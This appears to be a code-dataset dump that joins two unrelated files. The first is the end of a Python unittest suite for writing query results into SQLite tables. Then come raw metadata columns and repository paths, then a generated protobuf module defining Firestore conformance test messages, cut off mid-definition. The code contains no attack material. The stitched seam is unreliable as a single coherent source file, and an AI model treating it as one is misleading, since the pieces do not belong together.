rdb.DBF_RECORDSIZE : self._query2[qs.QRY_DBRECORDSIZE],
rdb.DBF_WHERECLAUSE : self._query2[qs.QRY_WHERECLAUSE],
rdb.DBF_IBM1SUPPORTED : "IBM1" in self._query2[qs.QRY_PERF],
rdb.DBF_IBM2SUPPORTED : "IBM2" in self._query2[qs.QRY_PERF],
rdb.DBF_COLUMBIASUPPORTED : "COL" in self._query2[qs.QRY_PERF],
rdb.DBF_NUMMATCHINGRECORDS : matching_records,
rdb.DBF_MATCHINGRECORDIDS : matching_record_ids,
rdb.DBF_P1NEGATEDTERM : self._query2[qs.QRY_NEGATEDTERMS],
rdb.DBF_P1NUMTERMSPERCLAUSE :
self._query2[qs.QRY_NUMTERMSPERCLAUSE],
rdb.DBF_P1NUMCLAUSES : self._query2[qs.QRY_NUMCLAUSES] }
gold[rdb.DBF_SELECTSTAR] = entry[rdb.DBF_SELECTSTAR]
self.assertEqual(entry, gold)
def test_write_to_full_table_q1(self):
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
db_name = ':memory:'
db_object = ta1_database.Ta1ResultsDB(db_name)
qr.QueryResultBase.write_to_full_table(self._query1,
self._result1, db_object)
db_object._execute("SELECT * FROM " + rdb.DBF_TABLENAME)
rows = db_object._fetchall()
self.assertEqual(len(rows), 1)
fields = [ \
(rdb.DBF_FQID, 1),
(rdb.DBF_CAT, self._query1[qs.QRY_CAT]),
(rdb.DBF_SUBCAT, self._query1[qs.QRY_SUBCAT]),
(rdb.DBF_NUMRECORDS, self._query1[qs.QRY_DBNUMRECORDS]),
(rdb.DBF_RECORDSIZE, self._query1[qs.QRY_DBRECORDSIZE]),
(rdb.DBF_WHERECLAUSE, self._query1[qs.QRY_WHERECLAUSE]),
(rdb.DBF_NUMMATCHINGRECORDS, 2),
(rdb.DBF_MATCHINGRECORDIDS, "1|3" ),
(rdb.DBF_P1NUMTERMSPERCLAUSE,
self._query1[qs.QRY_NUMTERMSPERCLAUSE]),
(rdb.DBF_P1ANDNUMRECORDSMATCHINGFIRSTTERM,
self._result1[qs.QRY_NUMRECORDSMATCHINGFIRSTTERM]),
(rdb.DBF_P1NUMCLAUSES, self._query1[qs.QRY_NUMCLAUSES]),
(rdb.DBF_IBM1SUPPORTED, "IBM1" in self._query1[qs.QRY_PERF]),
(rdb.DBF_IBM2SUPPORTED, "IBM2" in self._query1[qs.QRY_PERF]),
(rdb.DBF_COLUMBIASUPPORTED, "COL" in self._query1[qs.QRY_PERF]) ]
for field, gold in fields:
cmd = "SELECT " + field + " FROM " + rdb.DBF_TABLENAME
db_object._execute(cmd)
row = db_object._fetchone()
# note: row is a tuple, we want the first element
self.assertEqual(row[0], gold)
db_object.close()
def test_write_to_full_table_q2(self):
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
db_name = ':memory:'
db_object = ta1_database.Ta1ResultsDB(db_name)
qr.QueryResultBase.write_to_full_table(self._query2,
self._result2, db_object)
db_object._execute("SELECT * FROM " + rdb.DBF_TABLENAME)
rows = db_object._fetchall()
self.assertEqual(len(rows), 1)
fields = [ \
(rdb.DBF_FQID, 2),
(rdb.DBF_CAT, self._query2[qs.QRY_CAT]),
(rdb.DBF_SUBCAT, self._query2[qs.QRY_SUBCAT]),
(rdb.DBF_NUMRECORDS, self._query2[qs.QRY_DBNUMRECORDS]),
(rdb.DBF_RECORDSIZE, self._query2[qs.QRY_DBRECORDSIZE]),
(rdb.DBF_WHERECLAUSE, self._query2[qs.QRY_WHERECLAUSE]),
(rdb.DBF_NUMMATCHINGRECORDS, 2),
(rdb.DBF_MATCHINGRECORDIDS, "1|3" ),
(rdb.DBF_P1NEGATEDTERM, "0|1"),
(rdb.DBF_P1NUMTERMSPERCLAUSE,
self._query2[qs.QRY_NUMTERMSPERCLAUSE]),
(rdb.DBF_P1NUMCLAUSES, self._query1[qs.QRY_NUMCLAUSES]),
(rdb.DBF_IBM1SUPPORTED, "IBM1" in self._query2[qs.QRY_PERF]),
(rdb.DBF_IBM2SUPPORTED, "IBM2" in self._query2[qs.QRY_PERF]),
(rdb.DBF_COLUMBIASUPPORTED, "COL" in self._query2[qs.QRY_PERF]) ]
for field, gold in fields:
cmd = "SELECT " + field + " FROM " + rdb.DBF_TABLENAME
db_object._execute(cmd)
row = db_object._fetchone()
# note: row is a tuple, we want the first element
self.assertEqual(row[0], gold)
db_object.close()
def test_pre_write_to_full_to_atomic_table(self):
qids.reset_full_to_atomic_qid_seen()
entries = \
qr.QueryResultBase._pre_write_to_full_to_atomic_table(self._query1,
self._result1)
gold = [ { rdb.F2A_FQID : 1, rdb.F2A_AQID : 2 },
{ rdb.F2A_FQID : 1, rdb.F2A_AQID : 3 } ]
self.assertEqual(entries, gold)
def test_write_to_full_to_atomic_table(self):
qids.reset_full_to_atomic_qid_seen()
db_name = ':memory:'
db_object = ta1_database.Ta1ResultsDB(db_name)
qr.QueryResultBase.write_to_full_to_atomic_table(self._query1,
self._result1,
db_object)
db_object._execute("SELECT * FROM " + rdb.F2A_TABLENAME)
rows = db_object._fetchall()
self.assertEqual(len(rows), 2)
self.assertEqual(rows[0], (1,2))
self.assertEqual(rows[1], (1,3))
db_object.close()
def test_pre_write_to_full_to_full_table(self):
# note it really does not make sense to call full_to_full on a P1-and but it works to test it
qids.reset_full_to_full_qid_seen()
entries = \
qr.QueryResultBase._pre_write_to_full_to_full_table(self._query1,
self._result1)
gold = [ { rdb.F2F_BASEQID : 1, rdb.F2F_COMPOSITEQID : 2 },
{ rdb.F2F_BASEQID : 1, rdb.F2F_COMPOSITEQID : 3 } ]
self.assertEqual(entries, gold)
def test_write_to_full_to_full_table(self):
# note it really does not make sense to call full_to_full on a P1-and but it works to test it
qids.reset_full_to_full_qid_seen()
db_name = ':memory:'
db_object = ta1_database.Ta1ResultsDB(db_name)
qr.QueryResultBase.write_to_full_to_full_table(self._query1,
self._result1, db_object)
db_object._execute("SELECT * FROM " + rdb.F2F_TABLENAME)
rows = db_object._fetchall()
self.assertEqual(len(rows), 2)
self.assertEqual(rows[0], (1,2))
self.assertEqual(rows[1], (1,3))
db_object.close()
| 44.821429
| 101
| 0.592377
| 4,290
| 37,650
| 4.798835
| 0.057809
| 0.049789
| 0.049157
| 0.037159
| 0.92607
| 0.919318
| 0.9029
| 0.871327
| 0.852431
| 0.850245
| 0
| 0.025149
| 0.310359
| 37,650
| 839
| 102
| 44.874851
| 0.767726
| 0.04332
| 0
| 0.716814
| 0
| 0
| 0.0188
| 0.002654
| 0
| 0
| 0
| 0
| 0.135693
| 1
| 0.047198
| false
| 0
| 0.011799
| 0
| 0.067847
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
126887881e53ed807aebac36f62240bab7f4f4f3
| 71,826
|
py
|
Python
|
firestore/google/cloud/firestore_v1/proto/tests_pb2.py
|
DaveCheez/google-cloud-python
|
fc03d4d41f13e9d13db7206438163b3a471fdabd
|
[
"Apache-2.0"
] | 2
|
2020-05-17T12:53:06.000Z
|
2021-04-12T02:13:43.000Z
|
firestore/google/cloud/firestore_v1/proto/tests_pb2.py
|
DaveCheez/google-cloud-python
|
fc03d4d41f13e9d13db7206438163b3a471fdabd
|
[
"Apache-2.0"
] | 40
|
2019-07-16T10:04:48.000Z
|
2020-01-20T09:04:59.000Z
|
firestore/google/cloud/firestore_v1/proto/tests_pb2.py
|
DaveCheez/google-cloud-python
|
fc03d4d41f13e9d13db7206438163b3a471fdabd
|
[
"Apache-2.0"
] | 2
|
2019-07-18T00:05:31.000Z
|
2019-11-27T14:17:22.000Z
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/firestore_v1/proto/tests.proto
import sys
_b = sys.version_info[0] < 3 and (lambda x: x) or (lambda x: x.encode("latin1"))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.cloud.firestore_v1.proto import (
common_pb2 as google_dot_cloud_dot_firestore__v1_dot_proto_dot_common__pb2,
)
from google.cloud.firestore_v1.proto import (
document_pb2 as google_dot_cloud_dot_firestore__v1_dot_proto_dot_document__pb2,
)
from google.cloud.firestore_v1.proto import (
firestore_pb2 as google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2,
)
from google.cloud.firestore_v1.proto import (
query_pb2 as google_dot_cloud_dot_firestore__v1_dot_proto_dot_query__pb2,
)
from google.protobuf import timestamp_pb2 as google_dot_protobuf_dot_timestamp__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name="google/cloud/firestore_v1/proto/tests.proto",
package="google.cloud.firestore_v1.proto",
syntax="proto3",
serialized_pb=_b(
'\n+google/cloud/firestore_v1/proto/tests.proto\x12\x1fgoogle.cloud.firestore_v1.proto\x1a,google/cloud/firestore_v1/proto/common.proto\x1a.google/cloud/firestore_v1/proto/document.proto\x1a/google/cloud/firestore_v1/proto/firestore.proto\x1a+google/cloud/firestore_v1/proto/query.proto\x1a\x1fgoogle/protobuf/timestamp.proto"@\n\x08TestFile\x12\x34\n\x05tests\x18\x01 \x03(\x0b\x32%.google.cloud.firestore_v1.proto.Test"\xa9\x04\n\x04Test\x12\x13\n\x0b\x64\x65scription\x18\x01 \x01(\t\x12\x0f\n\x07\x63omment\x18\n \x01(\t\x12\x37\n\x03get\x18\x02 \x01(\x0b\x32(.google.cloud.firestore_v1.proto.GetTestH\x00\x12=\n\x06\x63reate\x18\x03 \x01(\x0b\x32+.google.cloud.firestore_v1.proto.CreateTestH\x00\x12\x37\n\x03set\x18\x04 \x01(\x0b\x32(.google.cloud.firestore_v1.proto.SetTestH\x00\x12=\n\x06update\x18\x05 \x01(\x0b\x32+.google.cloud.firestore_v1.proto.UpdateTestH\x00\x12H\n\x0cupdate_paths\x18\x06 \x01(\x0b\x32\x30.google.cloud.firestore_v1.proto.UpdatePathsTestH\x00\x12=\n\x06\x64\x65lete\x18\x07 \x01(\x0b\x32+.google.cloud.firestore_v1.proto.DeleteTestH\x00\x12;\n\x05query\x18\x08 \x01(\x0b\x32*.google.cloud.firestore_v1.proto.QueryTestH\x00\x12=\n\x06listen\x18\t \x01(\x0b\x32+.google.cloud.firestore_v1.proto.ListenTestH\x00\x42\x06\n\x04test"Y\n\x07GetTest\x12\x14\n\x0c\x64oc_ref_path\x18\x01 \x01(\t\x12\x38\n\x07request\x18\x02 \x01(\x0b\x32\'.google.firestore.v1.GetDocumentRequest"|\n\nCreateTest\x12\x14\n\x0c\x64oc_ref_path\x18\x01 \x01(\t\x12\x11\n\tjson_data\x18\x02 \x01(\t\x12\x33\n\x07request\x18\x03 \x01(\x0b\x32".google.firestore.v1.CommitRequest\x12\x10\n\x08is_error\x18\x04 \x01(\x08"\xb5\x01\n\x07SetTest\x12\x14\n\x0c\x64oc_ref_path\x18\x01 \x01(\t\x12:\n\x06option\x18\x02 \x01(\x0b\x32*.google.cloud.firestore_v1.proto.SetOption\x12\x11\n\tjson_data\x18\x03 \x01(\t\x12\x33\n\x07request\x18\x04 \x01(\x0b\x32".google.firestore.v1.CommitRequest\x12\x10\n\x08is_error\x18\x05 \x01(\x08"\xb5\x01\n\nUpdateTest\x12\x14\n\x0c\x64oc_ref_path\x18\x01 \x01(\t\x12\x37\n\x0cprecondition\x18\x02 \x01(\x0b\x32!.google.firestore.v1.Precondition\x12\x11\n\tjson_data\x18\x03 \x01(\t\x12\x33\n\x07request\x18\x04 \x01(\x0b\x32".google.firestore.v1.CommitRequest\x12\x10\n\x08is_error\x18\x05 \x01(\x08"\xfd\x01\n\x0fUpdatePathsTest\x12\x14\n\x0c\x64oc_ref_path\x18\x01 \x01(\t\x12\x37\n\x0cprecondition\x18\x02 \x01(\x0b\x32!.google.firestore.v1.Precondition\x12?\n\x0b\x66ield_paths\x18\x03 \x03(\x0b\x32*.google.cloud.firestore_v1.proto.FieldPath\x12\x13\n\x0bjson_values\x18\x04 \x03(\t\x12\x33\n\x07request\x18\x05 \x01(\x0b\x32".google.firestore.v1.CommitRequest\x12\x10\n\x08is_error\x18\x06 \x01(\x08"\xa2\x01\n\nDeleteTest\x12\x14\n\x0c\x64oc_ref_path\x18\x01 \x01(\t\x12\x37\n\x0cprecondition\x18\x02 \x01(\x0b\x32!.google.firestore.v1.Precondition\x12\x33\n\x07request\x18\x03 \x01(\x0b\x32".google.firestore.v1.CommitRequest\x12\x10\n\x08is_error\x18\x04 \x01(\x08"T\n\tSetOption\x12\x0b\n\x03\x61ll\x18\x01 \x01(\x08\x12:\n\x06\x66ields\x18\x02 \x03(\x0b\x32*.google.cloud.firestore_v1.proto.FieldPath"\x9f\x01\n\tQueryTest\x12\x11\n\tcoll_path\x18\x01 \x01(\t\x12\x38\n\x07\x63lauses\x18\x02 \x03(\x0b\x32\'.google.cloud.firestore_v1.proto.Clause\x12\x33\n\x05query\x18\x03 \x01(\x0b\x32$.google.firestore.v1.StructuredQuery\x12\x10\n\x08is_error\x18\x04 \x01(\x08"\xde\x03\n\x06\x43lause\x12\x39\n\x06select\x18\x01 \x01(\x0b\x32\'.google.cloud.firestore_v1.proto.SelectH\x00\x12\x37\n\x05where\x18\x02 \x01(\x0b\x32&.google.cloud.firestore_v1.proto.WhereH\x00\x12<\n\x08order_by\x18\x03 \x01(\x0b\x32(.google.cloud.firestore_v1.proto.OrderByH\x00\x12\x10\n\x06offset\x18\x04 \x01(\x05H\x00\x12\x0f\n\x05limit\x18\x05 \x01(\x05H\x00\x12;\n\x08start_at\x18\x06 \x01(\x0b\x32\'.google.cloud.firestore_v1.proto.CursorH\x00\x12>\n\x0bstart_after\x18\x07 \x01(\x0b\x32\'.google.cloud.firestore_v1.proto.CursorH\x00\x12\x39\n\x06\x65nd_at\x18\x08 \x01(\x0b\x32\'.google.cloud.firestore_v1.proto.CursorH\x00\x12=\n\nend_before\x18\t \x01(\x0b\x32\'.google.cloud.firestore_v1.proto.CursorH\x00\x42\x08\n\x06\x63lause"D\n\x06Select\x12:\n\x06\x66ields\x18\x01 \x03(\x0b\x32*.google.cloud.firestore_v1.proto.FieldPath"a\n\x05Where\x12\x38\n\x04path\x18\x01 \x01(\x0b\x32*.google.cloud.firestore_v1.proto.FieldPath\x12\n\n\x02op\x18\x02 \x01(\t\x12\x12\n\njson_value\x18\x03 \x01(\t"V\n\x07OrderBy\x12\x38\n\x04path\x18\x01 \x01(\x0b\x32*.google.cloud.firestore_v1.proto.FieldPath\x12\x11\n\tdirection\x18\x02 \x01(\t"a\n\x06\x43ursor\x12\x42\n\x0c\x64oc_snapshot\x18\x01 \x01(\x0b\x32,.google.cloud.firestore_v1.proto.DocSnapshot\x12\x13\n\x0bjson_values\x18\x02 \x03(\t".\n\x0b\x44ocSnapshot\x12\x0c\n\x04path\x18\x01 \x01(\t\x12\x11\n\tjson_data\x18\x02 \x01(\t"\x1a\n\tFieldPath\x12\r\n\x05\x66ield\x18\x01 \x03(\t"\x94\x01\n\nListenTest\x12\x36\n\tresponses\x18\x01 \x03(\x0b\x32#.google.firestore.v1.ListenResponse\x12<\n\tsnapshots\x18\x02 \x03(\x0b\x32).google.cloud.firestore_v1.proto.Snapshot\x12\x10\n\x08is_error\x18\x03 \x01(\x08"\xa3\x01\n\x08Snapshot\x12+\n\x04\x64ocs\x18\x01 \x03(\x0b\x32\x1d.google.firestore.v1.Document\x12;\n\x07\x63hanges\x18\x02 \x03(\x0b\x32*.google.cloud.firestore_v1.proto.DocChange\x12-\n\tread_time\x18\x03 \x01(\x0b\x32\x1a.google.protobuf.Timestamp"\xe0\x01\n\tDocChange\x12=\n\x04kind\x18\x01 \x01(\x0e\x32/.google.cloud.firestore_v1.proto.DocChange.Kind\x12*\n\x03\x64oc\x18\x02 \x01(\x0b\x32\x1d.google.firestore.v1.Document\x12\x11\n\told_index\x18\x03 \x01(\x05\x12\x11\n\tnew_index\x18\x04 \x01(\x05"B\n\x04Kind\x12\x14\n\x10KIND_UNSPECIFIED\x10\x00\x12\t\n\x05\x41\x44\x44\x45\x44\x10\x01\x12\x0b\n\x07REMOVED\x10\x02\x12\x0c\n\x08MODIFIED\x10\x03\x42\x8b\x01\n)com.google.cloud.conformance.firestore.v1B\x0eTestDefinition\xaa\x02"Google.Cloud.Firestore.Tests.Proto\xca\x02(Google\\Cloud\\Firestore\\Tests\\Conformanceb\x06proto3'
),
dependencies=[
google_dot_cloud_dot_firestore__v1_dot_proto_dot_common__pb2.DESCRIPTOR,
google_dot_cloud_dot_firestore__v1_dot_proto_dot_document__pb2.DESCRIPTOR,
google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2.DESCRIPTOR,
google_dot_cloud_dot_firestore__v1_dot_proto_dot_query__pb2.DESCRIPTOR,
google_dot_protobuf_dot_timestamp__pb2.DESCRIPTOR,
],
)
_DOCCHANGE_KIND = _descriptor.EnumDescriptor(
name="Kind",
full_name="google.cloud.firestore_v1.proto.DocChange.Kind",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="KIND_UNSPECIFIED", index=0, number=0, options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="ADDED", index=1, number=1, options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="REMOVED", index=2, number=2, options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="MODIFIED", index=3, number=3, options=None, type=None
),
],
containing_type=None,
options=None,
serialized_start=3566,
serialized_end=3632,
)
_sym_db.RegisterEnumDescriptor(_DOCCHANGE_KIND)
_TESTFILE = _descriptor.Descriptor(
name="TestFile",
full_name="google.cloud.firestore_v1.proto.TestFile",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="tests",
full_name="google.cloud.firestore_v1.proto.TestFile.tests",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=301,
serialized_end=365,
)
_TEST = _descriptor.Descriptor(
name="Test",
full_name="google.cloud.firestore_v1.proto.Test",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="description",
full_name="google.cloud.firestore_v1.proto.Test.description",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="comment",
full_name="google.cloud.firestore_v1.proto.Test.comment",
index=1,
number=10,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="get",
full_name="google.cloud.firestore_v1.proto.Test.get",
index=2,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="create",
full_name="google.cloud.firestore_v1.proto.Test.create",
index=3,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="set",
full_name="google.cloud.firestore_v1.proto.Test.set",
index=4,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="update",
full_name="google.cloud.firestore_v1.proto.Test.update",
index=5,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="update_paths",
full_name="google.cloud.firestore_v1.proto.Test.update_paths",
index=6,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="delete",
full_name="google.cloud.firestore_v1.proto.Test.delete",
index=7,
number=7,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="query",
full_name="google.cloud.firestore_v1.proto.Test.query",
index=8,
number=8,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="listen",
full_name="google.cloud.firestore_v1.proto.Test.listen",
index=9,
number=9,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="test",
full_name="google.cloud.firestore_v1.proto.Test.test",
index=0,
containing_type=None,
fields=[],
)
],
serialized_start=368,
serialized_end=921,
)
_GETTEST = _descriptor.Descriptor(
name="GetTest",
full_name="google.cloud.firestore_v1.proto.GetTest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="doc_ref_path",
full_name="google.cloud.firestore_v1.proto.GetTest.doc_ref_path",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="request",
full_name="google.cloud.firestore_v1.proto.GetTest.request",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=923,
serialized_end=1012,
)
_CREATETEST = _descriptor.Descriptor(
name="CreateTest",
full_name="google.cloud.firestore_v1.proto.CreateTest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="doc_ref_path",
full_name="google.cloud.firestore_v1.proto.CreateTest.doc_ref_path",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="json_data",
full_name="google.cloud.firestore_v1.proto.CreateTest.json_data",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="request",
full_name="google.cloud.firestore_v1.proto.CreateTest.request",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="is_error",
full_name="google.cloud.firestore_v1.proto.CreateTest.is_error",
index=3,
number=4,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1014,
serialized_end=1138,
)
_SETTEST = _descriptor.Descriptor(
name="SetTest",
full_name="google.cloud.firestore_v1.proto.SetTest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="doc_ref_path",
full_name="google.cloud.firestore_v1.proto.SetTest.doc_ref_path",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="option",
full_name="google.cloud.firestore_v1.proto.SetTest.option",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="json_data",
full_name="google.cloud.firestore_v1.proto.SetTest.json_data",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="request",
full_name="google.cloud.firestore_v1.proto.SetTest.request",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="is_error",
full_name="google.cloud.firestore_v1.proto.SetTest.is_error",
index=4,
number=5,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1141,
serialized_end=1322,
)
_UPDATETEST = _descriptor.Descriptor(
name="UpdateTest",
full_name="google.cloud.firestore_v1.proto.UpdateTest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="doc_ref_path",
full_name="google.cloud.firestore_v1.proto.UpdateTest.doc_ref_path",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="precondition",
full_name="google.cloud.firestore_v1.proto.UpdateTest.precondition",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="json_data",
full_name="google.cloud.firestore_v1.proto.UpdateTest.json_data",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="request",
full_name="google.cloud.firestore_v1.proto.UpdateTest.request",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="is_error",
full_name="google.cloud.firestore_v1.proto.UpdateTest.is_error",
index=4,
number=5,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1325,
serialized_end=1506,
)
_UPDATEPATHSTEST = _descriptor.Descriptor(
name="UpdatePathsTest",
full_name="google.cloud.firestore_v1.proto.UpdatePathsTest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="doc_ref_path",
full_name="google.cloud.firestore_v1.proto.UpdatePathsTest.doc_ref_path",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="precondition",
full_name="google.cloud.firestore_v1.proto.UpdatePathsTest.precondition",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="field_paths",
full_name="google.cloud.firestore_v1.proto.UpdatePathsTest.field_paths",
index=2,
number=3,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
